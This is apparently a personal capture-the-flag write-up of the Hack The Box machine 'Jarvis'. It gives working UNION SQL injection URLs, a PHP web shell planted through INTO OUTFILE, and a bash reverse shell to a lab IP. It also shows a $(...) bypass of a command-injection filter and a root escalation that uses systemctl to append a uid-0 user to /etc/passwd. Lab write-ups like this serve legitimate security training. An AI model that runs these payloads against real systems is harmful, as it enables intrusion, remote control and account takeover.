Jarvis #24 SQL Injection (UNION) & abusing systemctl with wrong permission.
Nmap scan result:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 03:f3:4e:22:36:3e:3b:81:30:79:ed:49:67:65:16:67 (RSA)
| 256 25:d8:08:a8:4d:6d:e8:d2:f8:43:4a:2c:20:c8:5a:f6 (ECDSA)
|_ 256 77:d4:ae:1f:b0:be:15:1f:f8:cd:c8:15:3a:c3:69:e1 (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Stark Hotel
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Port 80 Enum:

\
Creds?
supersecurehotel.htb

found a php admin page

These are the ones for the record

We could try some manual SQL injection?

phpMyAdmin 4.8.0

http://[HOST]/phpmyadmin/sql.php?sql_query=DROP+DATABASE+[DBNAME]
I got stuck here...
I saw something strange when I clicked the image in the home page.

entering single quatation, "'" in the param, the picture disappears

By incrementing the column number, I see that picture disappears at 8, which means there are 7 columns.
Union Select method:
-1 union select 1,2,3,4,5,6,7

We can see that the data changed.
http://supersecurehotel.htb/room.php?cod=-1%20union%20select%201,database(),3,4,5,6,7

Extracting data with union

load_file('/etc/passwd')

Can we run a command?
http://supersecurehotel.htb/room.php?cod=-1%20union%20select%201,%3C?php%20system($_REQUEST[%22exec%22]);%20?%3E,3,4,5,6,7%20into%20outfile%20%27/var/www/html/gori.php%27
'<?php system($_REQUEST["exec"]); ?>'

code execution is enabled.

python reverse shell worked


user pepper found
sudo -l

running the file with the user pepper:

It takes our input (it assumes that it’s an ip) and executes
ping
on it, to prevent command injection it checks for these characters:& ; - ` || |
However, It doesn’t check for the dollar sign (
$
), the dollar sign can be used to execute commands like this: $(command)
So for example if we do ping -c 1 $(echo 127.0.0.1)
, echo 127.0.0.1
will be executed first then the ping
command will be executed:
echo 'bash -c "bash -i >& /dev/tcp/10.10.16.18/4444 0>&1"' > /tmp/shell.sh
chmod +x /tmp/shell.sh
and run the same script
--- we could've also done ($bash)

Now we are pepper!

Exploit suggester:

find / -perm -4000 2>/dev/null

This was super cool!!!

Another way to root:
I created a service that executes
/dev/shm/root.sh
:[Unit]
Description=pwned
[Service]
ExecStart=/dev/shm/root.sh
[Install]
WantedBy=multi-user.target
And I created
/dev/shm/root.sh
which echoes:rooot:gDlPrjU6SWeKo:0:0:root:/root:/bin/bash
[email protected]:/dev/shm$ nano root.service
[email protected]:/dev/shm$ cat root.service
[Unit]
Description=pwned
[Service]
ExecStart=/dev/shm/root.sh
[Install]
WantedBy=multi-user.target
[email protected]:/dev/shm$ nano root.sh
[email protected]:/dev/shm$ chmod +x root.sh
[email protected]:/dev/shm$ cat root.sh
#!/bin/bash
echo 'rooot:gDlPrjU6SWeKo:0:0:root:/root:/bin/bash' >> /etc/passwd
[email protected]:/dev/shm$
I enabled the service and started it:
[email protected]:/dev/shm$ systemctl enable /dev/shm/root.service
Created symlink /etc/systemd/system/multi-user.target.wants/root.service -> /dev/shm/root.service.
Created symlink /etc/systemd/system/root.service -> /dev/shm/root.service.
[email protected]:/dev/shm$ systemctl start root.service
[email protected]:/dev/shm$
Now if we check
/etc/passwd
we’ll see that it has been modified:[email protected]:/dev/shm$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
pepper:x:1000:1000:,,,:/home/pepper:/bin/bash
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin
rooot:gDlPrjU6SWeKo:0:0:root:/root:/bin/bash
[email protected]:/dev/shm$
[email protected]:/dev/shm$ su rooot
Password:
[email protected]:/dev/shm# id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:/dev/shm# whoami
root
Last modified 1yr ago